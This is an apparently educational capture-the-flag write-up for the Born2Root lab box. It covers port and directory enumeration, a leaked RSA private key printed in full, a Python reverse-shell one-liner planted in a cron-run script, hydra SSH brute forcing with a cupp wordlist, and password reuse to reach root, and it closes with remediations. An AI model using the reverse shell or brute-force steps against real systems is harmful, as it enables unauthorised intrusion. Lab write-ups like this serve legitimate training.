This is a write up for the box Born2Root on proving grounds.
Enumeration: Port Scan
Starting off by running RustScan on the box to find out some open ports.
┌──(hhhharshil㉿kali)-[~/Desktop/Born2Root]
└─$ rustscan -a 192.168.155.49 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan : -------------------------------------- 🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/hhhharshil/.rustscan.toml" !] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.155.49:80
Open 192.168.155.49:111
Open 192.168.155.49:22
Open 192.168.155.49:44532
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOr5EAJPlf3kg7Bs1+wQTxbrIVGMP14vAg8EiV6sw7FL1WTjOvHw2A+LN4x2RoDCxmm2rqDslS+8VsszA0QEm11wmvrzi0uSaFo6eV2xGbHJai1u0pppUVkgBorcsQ4GRk+MR3dE8h1Q5JZknGDppzJn0wytGLwUTgBI6il6s3D9AAAAFQDhQ2zrYW+lBA8ncddkGV/lfDvBmQAAAIBtz2W0bjl6c3zXBOoRe0Ln5sNKtk6pOL1o+8jhhtKNouHsKDUCY3ffjOv2Ii0aewi/9GEeLDcG4qQegmcpipfwOK9tBU7zcSUel2wwXFntfzS9LA01iRM+koznfRKUI6+OD6HYelbS6u3Afvdk3MqfWJ1VkDjxhVC+Dk3pU1ILsQAAAIA7O2pIbd7AXtFP2MuoZf7PVV7JzyhaQTzpb1FlQzYR1Szh2bBGBGqIOieMGtNvQgJbqHRftPL9qS9OnmrDaT57dnN2LnNE/LAmxoNdNd24d3tw1iaSiI+hVjNK/3UpmxbNaqKi2jSSU6Kg2CAijtM8WeEO9MfeD+Lo/uIDUUWqvQ==
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC58lSYZIvI7cPPbWmDnfGKL+3UD5XOZtM+KkCmfEZmdDrFN3qFX8xx/fdkRr09rzeNDh8C75XgoO2HlAimjrK5Zx8SijQTCEn/PRNGDkTXdtadBgRDAewzWaR1gKzTZbvRX3evFqliKYTJGXiIhsrmKcZ3FPg+8lFiLeLayLCFXahJTHemWmpNi8LwNDcrZ5WC38V8+4xWR0QIu79PynTPTCFZXBcUC4QTEdTHlPcpKjs355JUoA4jx/zsWMUOQqBfEjjGA6ANrmepzqGTRDrGnbZwipDpeyISeNbxLwBUW82hN6Ijs0NLJkFpYsE2s9J+MNUlvJUs0QDRoxhMMdT/
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNRgqnpfkTw+7lHElDm2gphAkPR0fRzk/IFOhZXB8fTxM3dSYt41eek7NR5RqeIorxvabJoI0iPsmIo6z6s5Hlo=
| 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2f0pXci4jRaOVNrojXzEpVLq7TqjpkU5sbjorXNHfV
80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37163/udp status
| 100024 1 37475/udp6 status
| 100024 1 44532/tcp status
|_ 100024 1 60170/tcp6 status
Nmap Summary:
- Port 22 SSH
- Port 80 HTTP
- Port 111 RPC
Enumeration: HTTP
After noticing we have port 80 open I immediately go to the page we can see that some usernames are disclosed on the front page along with an email address.
Users: Martin N Hadi M Jimmy S
Email: martin@secretsec.com
Next we will look for any hidden directories.
I review the gobuster report and notice that we have the findings below:
====================================================================================================================================================================
└─$ gobuster dir -u http://192.168.202.49 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.202.49
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/24 01:56:08 Starting gobuster in directory enumeration mode
===============================================================
/icons (Status: 301) [Size: 316] [--> http://192.168.202.49/icons/]
/files (Status: 301) [Size: 316] [--> http://192.168.202.49/files/]
/manual (Status: 301) [Size: 317] [--> http://192.168.202.49/manual/]
In the /icons directory we notice a VDSoyuAXiO.txt which contains the output below:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
tprVUPb+fmkKvOf5ntACY7c/5fM4y83+UWPG0l90WrjdaTCPaGAHjEpZYKt0lEc0
FiQkXTvJS4faYHNah/mEvhldgTc59jeX4di0f660mJjF31SA9UgMLQReKd5GKtUx
5m+sQq6L+VyA2/6GD/T3qx35AT4argdk1NZ9ONmj1ZcIp0evVJvUul34zuJZ5mDv
DZuLRR6QpcMLJRGEFZ4qwkMZn7NavEmfX1Yka6mu9iwxkY6iT45YA1C4p7NEi5yI
/P6kDxMfCVELAUaU8fcPolkZ6xLdS6yyThZHHwIDAQABAoIBAAZ+clCTTA/E3n7E
LL/SvH3oGQd16xh9O2FyR4YIQMWQKwb7/OgOfEpWjpPf/dT+sK9eypnoDiZkmYhw
+rGii6Z2wCXhjN7wXPnj1qotXkpu4bgS3+F8+BLjlQ79ny2Busf+pQNf1syexDJS
sEkoDLGTBiubD3Ii4UoF7KfsozihdmQY5qud2c4iE0ioayo2m9XIDreJEB20Q5Ta
lV0G03unv/v7OK3g8dAQHrBR9MXuYiorcwxLAe+Gm1h4XanMKDYM5/jW4JO2ITAn
kPducC9chbM4NqB3ryNCD4YEgx8zWGDt0wjgyfnsF4fiYEI6tqAwWoB0tdqJFXAy
FlQJfYECgYEAz1bFCpGBCApF1k/oaQAyy5tir5NQpttCc0L2U1kiJWNmJSHk/tTX
4+ly0CBUzDkkedY1tVYK7TuH7/tOjh8M1BLa+g+Csb/OWLuMKmpoqyaejmoKkLnB
WVGkcdIulfsW7DWVMS/zA8ixJpt7bvY7Y142gkurxqjLMz5s/xT9geECgYEAxpfC
fGvogWRYUY07OLE/b7oMVOdBQsmlnaKVybuKf3RjeCYhbiRSzKz05NM/1Cqf359l
Wdznq4fkIvr6khliuj8GuCwv6wKn9+nViS18s1bG6Z5UJYSRJRpviCS+9BGShG1s
KOf1fAWNwRcn1UKtdQVvaLBX9kIwcmTBrl+e6P8CgYAtz24Zt6xaqmpjv6QKDxEq
C1rykAnx0+AKt3DVWYxB1oRrD+IYq85HfPzxHzOdK8LzaHDVb/1aDR0r2MqyfAnJ
kaDwPx0RSN++mzGM7ZXSuuWtcaCD+YbOxUsgGuBQIvodlnkwNPfsjhsV/KR5D85v
VhGVGEML0Z+T4ucSNQEOAQKBgQCHedfvUR3Xx0CIwbP4xNHlwiHPecMHcNBObS+J
4ypkMF37BOghXx4tCoA16fbNIhbWUsKtPwm79oQnaNeu+ypiq8RFt78orzMu6JIH
dsRvA2/Gx3/X6Eur6BDV61to3OP6+zqh3TuWU6OUadt+nHIANqj93e7jy9uI7jtC
XXDmuQKBgHZAE6GTq47k4sbFbWqldS79yhjjLloj0VUhValZyAP6XV8JTiAg9CYR
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----
This is a users ssh key although we do not know which one we have 4 users we can try.
SSH Enumeration
we will copy the contents of VDSoyuAXiO.txt into a new file named id_rsa.
Next we will change the permissions of the file using chmod 600 id_rsa
Permissions of 600 mean that the owner has full read and write access to the file, while no other user can access the file
Next we can try to ssh into the box using the command
ssh -i id_rsa martin@192.168.202.49
Once we login we see that we are prompted to enter a passsword to gain access luckily it was a simple answer.
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 9 20:31:29 2017 from 192.168.0.42
READY TO ACCESS THE SECRET LAB ?
secret password : password
WELCOME !
martin@debian:~$
Privilege Escalation
martin@debian:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
/etc/crontab contains a scheduled task to run a sekurity.py file every 5min and it is running as the user jimmy. We can insert malicious code into this file and get a shell as the user jimmy since he is the one running this file.
Creating the sekurity.py file in /tmp/
touch sekurity.py
echo 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.202",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(), 2);pty.spawn("/bin/bash")' > sekurity.py
nc -nvlp 4444
However once we are in as the user jimmy the only thing out of place is a suid writable file named networker.
cat /etc/passwd
martin@debian:/tmp$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash
We know that there is a last user is named hadi and that ssh is open we can try bruteforcing for creds as ssh is open.
cupp can be used to create a dictionary
common user password profiler - a tool used to create wordlists that can be used to bruteforce.
We used hydra to actually bruteforce the ssh service.
└─$ cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: hadi
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]: Y
> Do you want to add some random numbers at the end of words? Y/[N]:Y
> Leet mode? (i.e. leet = 1337) Y/[N]: N
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to hadi.txt, counting 1872 words.
[+] Now load your pistolero with hadi.txt and shoot! Good luck!
hydra -l hadi -P hadi.txt iphere -t 4 ssh
Password found was hadi123
we can ssh as hadi now using hadi123
Once we get in I tried using the same credentials to get into the root user and it worked.
hadi@debian:~$ su root
Password:
root@debian:/home/hadi#
Breakdown
- Directory busting exposed a /icons file which contained a text file that had a users ssh key.
- Usernames for potential users on the box were disclosed on the home page of the web server
- SSH was used to login as the user martin wget/curl was disabled which is good, however scp could be used to get a post exploitation enumeration tool such as linpeas on the box.
- a cronjob indicated that a file /tmp/sekurity.py would run every 5 min as the user jimmy this file was not present on the box so we can easily create one that is running a reverse shell.
- we get in as the user jimmy however we are only presented a networker file which is SUID writable.
-
cat /etc/passwd grep sh reveals there is one more user hadi on the box. - we know ssh is open so we can try to bruteforce the box using cupp to generate a wordlist
- we get in the box as hadi using hadi123
- credentials are reused by the root used and we can su root using hadis password
Remmediations
- Do not disclose ssh keys on publicaly readable web directories.
- Do not diclose usernames on the home page of the website
- Prevent password reusage especially for admin accounts.